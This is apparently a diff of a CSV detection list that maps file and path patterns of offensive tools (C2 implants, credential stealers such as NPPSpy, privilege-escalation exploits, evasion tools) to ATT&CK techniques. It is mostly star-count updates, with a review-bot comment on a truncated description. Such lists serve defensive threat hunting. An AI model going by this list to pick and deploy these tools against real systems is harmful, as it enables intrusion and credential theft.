Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/nikto.git*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" 
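Review bot: The rewritten `*/Nightmangle.git*` row still carries the truncated description `ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent`, with the leading "N" missing in the `metadata_description` field. The only value this hunk changes is the star count (72 to 73), so the typo is not new, but the line is being re-emitted and an analyst searching descriptions for the tool name will miss it. I would correct the field to `Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent`. If these rows are regenerated from a source list, which the metadata-only change suggests, the fix probably belongs there so the next refresh does not bring the typo back.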
@@ -4488,50 +4524,52 @@ "*/nimcrypt/*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*/Nimcrypt2*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*/NimExec.git*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight 
first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*/ninja.crt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.git*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ninja.key*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - 
T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/nipe.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" "*/nipe.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" -"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*/nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*/NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.git*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/nopac.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" -"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*/noseyparker.git*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*/NotQuite0DayFriday/zip/trunk*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/nowsecure/dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*/nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*/nps_payload.git*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*/nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
